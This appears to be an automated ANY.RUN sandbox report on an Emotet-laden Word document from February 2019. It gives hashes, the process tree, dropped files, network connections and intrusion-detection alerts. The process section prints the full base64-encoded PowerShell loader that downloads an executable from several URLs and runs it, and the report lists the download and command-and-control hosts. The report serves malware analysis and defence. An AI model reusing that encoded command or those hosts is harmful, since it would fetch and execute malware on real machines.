analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

DETAILS

Full analysis: https://app.any.run/tasks/40b5e633-290f-4908-af37-a8e4e38b481b
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: February 19, 2019, 12:21:04
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
trojan
feodo
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Feb 19 07:19:00 2019, Last Saved Time/Date: Tue Feb 19 07:19:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 8, Security: 0
MD5:

9F2B7A46D4026D82C1DC899BAE9CFD19

SHA1:

015FCF237214DFA3D72EDA2CA9B52142E2507797

SHA256:

11113652FC87312A3DDC9AAAE10C883C8A16A65175012F3E05137A748545399A

SSDEEP:

6144:cG5/BnVfRFJ7KK9aHScdX9znGUy/KPVaRG7LrVMzCXjkN:c2n9R/lA5dX9znGURpLr+zCXjE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 194.exe (PID: 4012)
      • 194.exe (PID: 2944)
      • wabmetagen.exe (PID: 2536)
      • wabmetagen.exe (PID: 3156)
    • Emotet process was detected

      • wabmetagen.exe (PID: 2536)
    • Downloads executable files from the Internet

      • powersheLl.exe (PID: 2432)
    • EMOTET was detected

      • wabmetagen.exe (PID: 3156)
    • Changes the autorun value in the registry

      • wabmetagen.exe (PID: 3156)
    • Connects to CnC server

      • wabmetagen.exe (PID: 3156)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powersheLl.exe (PID: 2432)
      • 194.exe (PID: 2944)
    • Creates files in the user directory

      • powersheLl.exe (PID: 2432)
    • Starts itself from another location

      • 194.exe (PID: 2944)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3020)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3020)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:02:19 07:19:00
ModifyDate: 2019:02:19 07:19:00
Pages: 1
Words: 1
Characters: 8
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 8
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 194.exe no specs 194.exe #EMOTET wabmetagen.exe no specs #EMOTET wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
3020"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\DETAILS.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2432powersheLl -e JABCAF8AXwAzADYAOQA0AD0AKAAnAEIANAAwACcAKwAnADAAXwAzACcAKQA7ACQATgA2AF8ANgAyADkAXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABjADAAXwAxADkAXwA9ACgAJwBoAHQAdABwADoALwAvAGMAJwArACcAaABpACcAKwAnAGwAZQAnACsAJwB2AGUAbgAuAGMAbwBtACcAKwAnAC8AQwB5AEoAJwArACcARQBYAHgAJwArACcAUgBXAGQAVgAnACsAJwBpAEgAJwArACcAUgBrAF8AVwBpAFEAJwArACcAVwAnACsAJwBAAGgAdAAnACsAJwB0ACcAKwAnAHAAOgAvAC8AZQB1AHIAbwBiAGEAbgBkAHUAJwArACcAcwBlAGQAdABpACcAKwAnAHIAZQBzAC4AYwAnACsAJwBvAG0ALwB6AFAASABqAHgAJwArACcAZwBIAE8ATwBjAEUATABEAEQAdABAACcAKwAnAGgAJwArACcAdAB0AHAAOgAvAC8AYwAnACsAJwBsAGUAJwArACcAYQBuAGUAYQB0ACcAKwAnAG8AbAAnACsAJwBvACcAKwAnAGcAeQBiAGwAbwBnACcAKwAnAC4AJwArACcAYwAnACsAJwBvACcAKwAnAG0ALwBoACcAKwAnAHkAaQAnACsAJwBDACcAKwAnAHYASgBDAHQAdAB1AGkAJwArACcATAB3ACcAKwAnAEAAJwArACcAaAB0ACcAKwAnAHQAcAAnACsAJwA6AC8AJwArACcALwBmAGEAaAByAGUAZAAnACsAJwBkACcAKwAnAGkAbgAnACsAJwAuACcAKwAnAGkAJwArACcAbgBmACcAKwAnAG8ALwBkACcAKwAnAFQAawBRAFMAdwBqACcAKwAnAGYAVQBrAE4AJwArACcAdQAnACsAJwBCACcAKwAnAG4AdgAnACsAJwBAACcAKwAnAGgAdAB0AHAAOgAvAC8AbgBlAHUAbQAnACsAJwBhACcAKwAnAHQAaQBjACcAKwAnAG8AcwB1ACcAKwAnAHQAJwArACcAaQAnACsAJwBsAGkAegBhACcAKwAnAGQAJwArACcAbwAnACsAJwBzAC4AJwArACcAYwBvAG0ALwBCAFkAJwArACcAdwBNAHgAVQBOAGYAeQBTACcAKwAnAEQAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQATABfAF8AXwBfAF8AMQBfAD0AKAAnAEQAJwArACcANwBfADYANwBfACcAKQA7ACQAZAA2AF8AXwA3ADMAXwAwACAAPQAgACgAJwAxADkAJwArACcANAAnACkAOwAkAEwAXwA3AF8AOAA0AF8APQAoACcAdQAnACsAJwAwAF8AOQBfADYAOQAnACkAOwAkAEQAMgBfADgAXwAxADQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGQANgBfAF8ANwAzAF8AMAArACgAJwAuAGUAeAAnACsAJwBlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEUAXwBfADIANAAzADMAXwAgAGkAbgAgACQAYwAwAF8AMQA5AF8AKQB7AHQAcgB5AHsAJABOADYAXwA2ADIAOQBfAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAEUAXwBfADIANAAzADMAXwAsACAAJABEADIAXwA4AF8AMQA0ACkAOwAkAGYANABfAF8ANAAxADYAPQAoACcAUAA5AF8AXwA3AF8AJwArACcAOQAnACkAOwBJAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABEADIAXwA4AF8AMQA0ACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQARAAyAF8AOABfADEANAA7ACQAbgAxADUAMABfADYANwAxAD0AKAAnAFgAOQA5AF8AXwAnACsAJwA1ACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABrADcAXwA2ADkANgBfADAAPQAoACcAQwA0ACcAKwAnADIAXwA2ACcAKwAnADgAXwAwACcAKQA7AA==C:\Windows\System32\WindowsPowerShell\v1.0\powersheLl.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4012"C:\Users\admin\194.exe" C:\Users\admin\194.exepowersheLl.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS(r) DLL for Win32
Exit code:
0
Version:
13.0.0.047
2944"C:\Users\admin\194.exe"C:\Users\admin\194.exe
194.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS(r) DLL for Win32
Exit code:
0
Version:
13.0.0.047
2536"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
194.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS(r) DLL for Win32
Exit code:
0
Version:
13.0.0.047
3156"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS(r) DLL for Win32
Version:
13.0.0.047
Total events
1 551
Read events
1 130
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
2
Unknown types
4

Dropped files

PID
Process
Filename
Type
3020WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE9F6.tmp.cvr
MD5:
SHA256:
2432powersheLl.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U92O2TYSGPW82YP016MH.temp
MD5:
SHA256:
3020WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:0CA7E7576C9097200B00364FFC3A8843
SHA256:858E0A8D282B8A7FE33583C07406B4EE332835A4992E92CD84861EDA7B507501
3020WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:BF35A0C434DAA0D3E8D9A563B40D11A6
SHA256:D38ECDDE2990540B0D386DE71F8D9C3D01449608B13ABF6778E07D25C287F6A4
2944194.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:CEAD5CE8AC5C0BDAFE1FE6EC84F75B1E
SHA256:48BBDFA6C94B4833D59159502A4852D7F991D6FEA81BE66D87AB87C9F7228AB6
3020WINWORD.EXEC:\Users\admin\Desktop\~$ETAILS.docpgc
MD5:EBE4D80E1A8EEAC0F82CBE7C227C6757
SHA256:9A02B374FFBFD99409B736BF7A63C9E91D6F8C2EAE4034C828FD27C55C2099BA
2432powersheLl.exeC:\Users\admin\194.exeexecutable
MD5:CEAD5CE8AC5C0BDAFE1FE6EC84F75B1E
SHA256:48BBDFA6C94B4833D59159502A4852D7F991D6FEA81BE66D87AB87C9F7228AB6
2432powersheLl.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
2432powersheLl.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f716.TMPbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
3020WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\DETAILS.doc.LNKlnk
MD5:B658F514BDE6FE77583F27F28456EBC0
SHA256:DBE1A0D7F8D0B2D1AC4F9FC6EFB76C0CD4E50A844505F41383F519A8576F3B93
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2432
powersheLl.exe
GET
200
66.70.176.6:80
http://chileven.com/CyJEXxRWdViHRk_WiQW/
CA
executable
132 Kb
suspicious
2432
powersheLl.exe
GET
301
66.70.176.6:80
http://chileven.com/CyJEXxRWdViHRk_WiQW
CA
html
248 b
suspicious
3156
wabmetagen.exe
GET
200
66.216.234.131:443
http://66.216.234.131:443/
US
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3156
wabmetagen.exe
66.216.234.131:443
Charter Communications
US
malicious
2432
powersheLl.exe
66.70.176.6:80
chileven.com
OVH SAS
CA
suspicious

DNS requests

Domain
IP
Reputation
chileven.com
  • 66.70.176.6
suspicious

Threats

PID
Process
Class
Message
2432
powersheLl.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2432
powersheLl.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2432
powersheLl.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3156
wabmetagen.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1 ETPRO signatures available at the full report
No debug info